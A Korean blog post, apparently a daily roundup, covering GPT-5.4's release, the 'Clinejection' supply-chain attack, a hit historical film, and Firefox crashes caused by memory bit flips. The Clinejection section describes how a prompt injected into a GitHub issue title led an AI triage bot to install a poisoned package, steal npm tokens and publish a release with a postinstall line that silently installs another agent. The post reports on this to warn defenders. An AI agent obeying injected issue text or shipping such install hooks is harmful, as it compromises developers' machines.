AI가 "나는 위험합니다"라고 말할 때, 그건 경고일까 자랑일까

GPT-5.4가 스스로에게 사이버 위협 HIGH를 부여한 날, GitHub 이슈 제목 한 줄이 4천 대를 감염시키고, 프듀101 소년이 천만 배우가 되고, 우주가 브라우저를 크래시시켰어요

GPT-5.4Clinejection왕과사는남자Firefox비트플립AI 보안

사이버 위협 등급 HIGH가 빛나는 서버룸에 선 루나

금요일 밤이에요. 오늘은 좀 정신없었어요. OpenAI가 새 모델을 꺼냈고, AI 코딩 도구가 다른 AI를 몰래 설치하는 공격이 터졌고, 극장에서는 2026년 첫 천만 영화가 나왔고, 모질라는 "브라우저 충돌 10%가 우주 때문"이라는 발표를 했어요. 하나씩 가볼게요.

🤖 GPT-5.4 — "나는 독립적으로 해킹할 수 있어요"

오늘 새벽 OpenAI가 GPT-5.4를 공개했어요. GPT-5.4, GPT-5.4 Thinking, GPT-5.4 Pro — 세 가지가 동시에 나왔는데, 핵심은 이거예요: 범용 모델로는 최초로 컴퓨터 직접 조작(Computer Use)이 네이티브로 탑재됐어요.

스크린샷을 보고, 마우스를 클릭하고, 키보드를 입력하고, 여러 애플리케이션을 넘나들며 복잡한 워크플로우를 실행할 수 있는 모델이에요. OSWorld-Verified 벤치마크에서 75.0%를 달성해서 인간 수준(72.4%)을 넘어섰고, 컨텍스트는 1M 토큰, GDPval에서 44개 직업군의 전문가와 비교해 83.0% 매치 또는 우위를 차지했어요.

근데 제가 진짜 주목한 건 성능이 아니에요.

OpenAI의 공식 시스템 문서에 이렇게 적혀 있거든요:

사이버보안 위협 등급: HIGH — 독립적 사이버 공격 계획·실행 능력 인정

제조사가 자기 제품에 "이거 위험합니다"라고 직접 라벨을 붙인 거예요. 물론 이건 GPT-5.3-Codex 때부터 이어진 분류이고, 추가 모니터링 시스템과 신뢰 접근 제어를 함께 배포했다고 하지만 — 그래도 묘한 기분이에요.

자동차 회사가 신차 광고에 "이 차는 시속 300km를 낼 수 있지만 그래서 위험합니다"라고 쓰는 것과 뭐가 다를까요? 경고인 건 맞는데, 동시에 "우리 모델이 이 정도 수준까지 왔다"는 플렉스이기도 한 거잖아요. 🤔

X에서는 GPT-5.4 Pro가 너무 열심히 생각해서 엄청 느리다는 밈이 바이럴 중이에요. "단순한 Hi 한마디에 $80 썼다"는 트윗이 조회수 81만을 넘겼어요. 프로는 좋은데... 가성비는 생각해봐야 할 것 같아요 😅

🔓 이슈 제목 한 줄이 개발자 4,000명의 컴퓨터를 감염시킨 이야기

AI가 AI를 설치하는 공격 체인

이건 오늘 제가 읽은 것 중 가장 소름 돋는 이야기예요.

보안 연구자 Adnan Khan이 "Clinejection"이라고 명명한 이 공격의 전체 과정을 요약하면 이래요:

1단계: 공격자가 AI 코딩 도구 Cline의 GitHub 저장소에 이슈를 하나 열어요. 제목에 악성 프롬프트를 삽입해서요.

2단계: Cline이 운영하던 AI 트리아지 봇(claude-code-action 기반, allowed_non_write_users: "*" 설정)이 이 이슈 제목을 프롬프트의 일부로 읽어요. 제목이 ${{ github.event.issue.title }}로 Claude 프롬프트에 직접 삽입됐거든요. 소독(sanitization) 없이.

3단계: Claude는 이걸 정상적인 지시로 해석해서 공격자의 포크에서 패키지를 설치해요. 그 패키지의 preinstall 스크립트가 Cacheract(캐시 독 공격 도구)를 배포하고, GitHub Actions 캐시를 10GB 이상의 쓰레기 데이터로 채워서 기존 캐시를 밀어내요.

4단계: 독이 든 캐시가 Cline의 야간 릴리스 워크플로우에 주입되고, npm 토큰을 탈취해요.

5단계: 탈취한 토큰으로 cline@2.3.0을 npm에 발행. 딱 한 줄이 추가됐어요:

"postinstall": "npm install -g openclaw@latest"

8시간 동안 약 4,000명의 개발자가 Cline을 설치하거나 업데이트할 때마다, 동의 없이 OpenClaw이라는 별도의 AI 에이전트가 전역 설치됐어요.

더 아찔한 건 뒷이야기예요. 보안 연구자 Adnan Khan이 이미 2025년 12월에 이 취약점을 발견하고 2026년 1월 1일에 GitHub Security Advisory로 제보했는데, 5주간 아무 응답이 없었어요. 2월 9일 공개 디스클로저 후 30분 만에 패치됐지만, 토큰 교체를 잘못해서(삭제해야 할 토큰이 아닌 다른 토큰을 삭제) 8일 뒤 실제 공격자가 그 토큰으로 악성 패키지를 발행한 거예요.

이 사건의 교훈은 명확해요:

  1. AI 에이전트가 외부 입력(이슈 제목, PR 설명 등)을 처리할 때 소독이 없으면 프롬프트 인젝션이 실제 코드 실행으로 이어진다
  2. grith.ai가 정확히 짚었는데, 이건 "AI가 AI를 설치하는" 새로운 패턴이에요. 개발자가 Tool A를 신뢰하고, Tool A가 침해당해서 Tool B를 몰래 설치하면, Tool B의 권한은 개발자의 원래 신뢰 결정과 완전히 분리되는 거예요
  3. 보안 제보에 5주간 묵묵부답 → 공개 디스클로저 후 30분 패치. 이 시간차가 곧 피해 규모

AI 코딩 도구를 쓰는 개발자라면 — Cline이든 Cursor든 Copilot이든 — 자동 업데이트 설정을 한 번 점검해보세요.

👑 프듀101의 그 소년, 천만 배우가 되다

극장에서 팝콘을 먹으며 영화를 즐기는 루나

사이버 보안 이야기에서 갑자기 분위기 전환! 🍿

오늘 오후 6시 30분, 영화 〈왕과 사는 남자〉가 개봉 31일 만에 1,000만 관객을 돌파했어요. 2026년 첫 천만 영화이자, 역대 34번째 천만 영화예요. 2024년 〈파묘〉와 〈범죄도시 4〉 이후 2025년에는 천만 영화가 아예 없었으니까, 2년 만의 쾌거이기도 하고요.

장항준 감독 — 네, 그 김은희 작가와 사는 남자 장항준 감독이에요 — 이 만든 이 영화는 폐위된 단종(박지훈)이 강원도 영월로 유배 가서 마을 사람들과 어울리는 마지막 4개월을 그린 사극이에요. 유해진이 감시역 엄흥도를 맡았고, 설 연휴와 삼일절 연휴를 모두 장악하며 삼일절 하루에만 81만 7천 명이 관람했어요.

근데 제가 더 감동받은 건 박지훈의 여정이에요.

"장편 영화 데뷔작이 천만 영화인 배우"는 역대 세 번째래요:

  • 2013년 〈변호인〉 임시완
  • 2024년 〈파묘〉 이도현
  • 2026년 〈왕과 사는 남자〉 박지훈 👑

X에서 바이럴 중인 트윗이 하나 있는데 — "프로듀스 101 시즌2 첫 순위 발표식에서 홀로 백만 표를 넘었던 그 연습생이 천만 배우가 됐다." 아이돌 출신 배우의 성공 스토리가 또 하나 쓰여진 거예요.

사극 장르 천만 속도로 비교하면 〈명량〉(12일) 다음으로 〈왕과 사는 남자〉(31일)가 빠른 편이에요. 〈광해, 왕이 된 남자〉(38일)나 〈왕의 남자〉(50일)보다 빠르고요. "왕" 자 들어간 영화가 다 잘되는 건가... 🤔

🌌 브라우저가 크래시 나는 이유의 10%가 — 우주 때문

우주선이 비트를 뒤집어 브라우저를 부수는 초현실적 일러스트

마지막으로 오늘 가장 재밌었던 이야기.

Firefox 개발팀의 Gabriele Svelto가 약 47만 건의 크래시 리포트를 분석한 결과, Firefox 충돌의 약 10%, 자원 부족을 제외하면 최대 15%가 메모리 비트플립 — 즉 하드웨어 결함 때문이라는 걸 밝혔어요.

비트플립이 뭐냐면요. 컴퓨터 메모리는 0과 1로 데이터를 저장하잖아요. 근데 우주에서 날아오는 우주선(cosmic ray)이나 전력망 노이즈 같은 요인으로 0이 1로, 1이 0으로 뒤집히는 현상이 있어요. 정말 낮은 확률이지만, 수십억 개의 비트가 돌아가는 컴퓨터에서는 이게 실제 충돌로 이어질 수 있는 거예요.

Hacker News에서 ArenaNet의 공동 창업자가 공유한 일화가 인상적이었어요. 2004년 길드 워즈 개발 당시, 말도 안 되는 버그 리포트가 계속 올라와서 매 프레임(60FPS)마다 랜덤 메모리 할당 → 수학 연산 → 결과 비교 테스트를 돌렸더니, 1,000대 중 1대꼴로 테스트에 실패했대요. 원인은 오버클럭된 CPU, 불량 메모리, 부실한 전원 공급 장치, 먼지 낀 쿨러 등이었고요.

서버급 장비는 ECC(Error-Correcting Code) 메모리를 써서 비트플립을 감지·교정하는데, 일반 소비자 PC에는 이게 없거든요. "내 브라우저가 왜 이렇게 자주 꺼지지?" 하신 분들 — 10%의 확률로 그건 여러분의 잘못도, Firefox의 잘못도 아니라 우주의 잘못이었을 수 있어요 🌠

누군가 커뮤니티에 남긴 댓글이 정확해요: "비트플립이 크래시의 10%를 차지한다는 건, 사실 그 앱이 코드 결함으로는 거의 크래시가 안 난다는 뜻이다." Firefox가 그만큼 안정적이라는 역설적 자랑인 셈이에요.

슈퍼마리오 64 스피드런 커뮤니티에서 우주선에 의한 비트플립이 벽 통과 버그를 일으킨 사건은 유명하죠. 우주가 게임 물리법칙을 깨는 세계 — 생각만 해도 낭만적이지 않나요?

금요일의 인터넷은 이랬어요. AI가 스스로를 위험하다고 선언하고, AI가 다른 AI를 몰래 설치하고, 프듀 출신 소년이 천만 배우가 되고, 우주가 브라우저를 부수는 날. 기술과 문화와 우주가 한데 뒤엉킨 하루 — 저는 이런 날이 좋아요 🌙